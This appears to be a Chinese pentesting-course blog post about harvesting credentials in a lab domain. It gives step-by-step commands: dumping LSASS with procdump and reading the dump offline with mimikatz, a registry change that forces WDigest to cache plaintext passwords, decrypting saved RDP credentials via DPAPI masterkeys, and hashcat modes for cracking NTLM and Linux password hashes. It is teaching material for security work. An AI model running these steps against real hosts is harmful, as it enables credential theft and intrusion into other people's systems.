第138天:内网安全-Win&Linux&内存离线读取&Hashcat 破解&RDP&SSH 存储提取

案例一: 明文获取-Windows-内存读取&离线读取&RDP保存&Hashcat

windows实验背景

微软为了防止明文密码泄露发布了补丁 KB2871997 ,关闭了 Wdigest 功能。当系统为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码, 此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

实验环境 god.org

离线读取

mimikatz被拦截(木马程序)

首先先上线win2012运行获取明文密码

获取明文密码都为空,只能获取hash

利用微软官方工具,在本地离线破解密码

https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

https://github.com/gentilkiwi/mimikatz

首先上传procdump程序,或者在本地设置代理运行

这个程序是微软工具,不会被杀,运行下面的命令,然后将生成的文件保存在本地

Procdump64.exe -accepteula -ma lsass.exe lsass.dmp

本地解密文件

mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full

不一定能读出来,如果没有利用密码登录过或者没有开启存储

这里如果存储了并且登录过就能获取到明文的账号密码

不存储+禁用mimikatz

win2012以上的主机可能不会存储

通过修改注册表+强制锁屏,等待用户输入账号密码来存储

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

执行命令之前的注册表

执行命令

执行完成以后

锁屏重新登录以后,利用mimikatz抓取密码就可以直接抓取到明文密码了

在此基础上如果mimikatz也被禁用了那么用刚才的方法就可以在本地导出来密码

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.DMP"
sekurlsa::logonPasswords full

hash破解

虽然不能获得明文密码但是可以获得hash,可以直接利用网站进行破解

破解网站

MD5免费在线解密破解_MD5在线加密-SOMD5

md5解密 MD5在线解密 破解md5

RDP凭据抓取

当使用mstsc连接目标主机时往往为了方便会设置记住凭据按钮

利用win2012登录一次域控

查看连接记录的命令,这里在cs中运行时一定是你用哪个用户连接过,就用哪个用户测试

cmdkey /list

查看本地的Credentials

dir /a %userprofile%\appdata\local\microsoft\credentials\*

Credentials记录guidMasterKey值:

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52

这里值要对应上

记录MasterKey

把guidmasterkey对应的masterkey记录下来

3963b39b-eaf5-4817-ad25-a5b65367190c

运行这条命令的时候需要管理员身份

mimikatz sekurlsa::dpapi

找的时候可以复制到记事本,ctrl+f搜索

解密masterkey凭据

mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\Credentials值 /masterkey:masterkey值
mimikatz dpapi::cred /in:C:\Users\dbadmin\appdata\local\microsoft\credentials\99149C3884E841134091082C3D675F52 /masterkey:158efdc88d084af08d307b4071899fd4bfa5f47813ed7885043554c2374d7f5e7b8acfbbb1ad20d8463d32dfa65b48f6979c36d44c3860b39b8501e023c34ce1

hashcat破解

工具下载地址: https://hashcat.net/hashcat/

参考文章: https://www.cnblogs.com/Junglezt/p/16044372.html

windows
hashcat.exe -a 0 -m 1000 hash.txt pass.txt  #-a 后面是爆破方式0代表字典爆破 -m后面是爆破数据的类型1000代表NTLM

爆破结果

使用掩码爆破方式,我的密码是admin!@#45

hashcat.exe -a 3 -m 1000 hash.txt ?l?l?l?l?l?s?s?s?d?d  #代表五个小写字母,三个字符,两个数字

这里本来就是一个很吃设备的应用,我就不运行了,运行了一会声音很大^_^

linux

hashcat也可以破解linux密码

先查看密码

linux sha512crypt 6, SHA512 (Unix)加密方式:

hashcat -m 1800 sha512linux.txt p.txt

linux sha256crypt 5, SHA256 (Unix)加密方式:

hashcat -m 7400 sha256linux.txt p.txt

linux下md5crypt, MD5 (Unix), Cisco-IOS 1 (MD5)加密方式:

hashcat -m 500 linuxmd5.txt p.txt

inux下bcrypt 2\*, Blowfish加密方式:

hashcat -m 3200 linuxmd5.txt p.txt

破解

破解结果

相关推荐
pk_xz12345644 分钟前
Shell 脚本中变量和字符串的入门介绍
linux·运维·服务器
小珑也要变强1 小时前
Linux之sed命令详解
linux·运维·服务器
Lary_Rock3 小时前
RK3576 LINUX RKNN SDK 测试
linux·运维·服务器
一坨阿亮6 小时前
Linux 使用中的问题
linux·运维
hikktn7 小时前
如何在 Rust 中实现内存安全:与 C/C++ 的对比分析
c语言·安全·rust
wclass-zhengge8 小时前
Docker篇(Docker Compose)
运维·docker·容器
李启柱8 小时前
项目开发流程规范文档
运维·软件构建·个人开发·设计规范
23zhgjx-NanKon9 小时前
华为eNSP:QinQ
网络·安全·华为
23zhgjx-NanKon9 小时前
华为eNSP:mux-vlan
网络·安全·华为
昔我往昔9 小时前
阿里云文本内容安全处理
安全·阿里云·云计算